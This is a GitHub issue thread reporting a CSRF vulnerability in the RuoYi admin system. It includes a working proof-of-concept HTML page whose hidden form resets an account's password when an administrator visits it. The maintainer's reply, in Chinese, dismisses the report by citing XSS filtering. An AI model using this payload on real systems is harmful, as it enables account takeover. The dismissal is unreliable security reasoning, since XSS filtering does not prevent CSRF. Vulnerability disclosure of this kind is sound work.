### ISSUE TITLE
There is CSRF, which can change any account password

### ISSUE THREAD

**Issue by Trepverterless** [yangzongzhuan/RuoYi#5]
As shown in the figure below, there is user management function
![image](https://user-images.githubusercontent.com/32705816/70330625-dfe9b900-1878-11ea-9a5c-2c198a2b63d2.png)
When constructing the following malicious page
```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="localhost/system/user/resetPwd" method="POST">
      <input type="hidden" name="userId" value="1" />
      <input type="hidden" name="loginName" value="test" />
      <input type="hidden" name="password" value="12345678" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
When the administrator is induced to visit the page, any account password can be reset

**Comment by yangzongzhuan** [comment]
你这不算问题，人为制造页面没有太大意义。页面都有xss过滤，添加不了脚本。
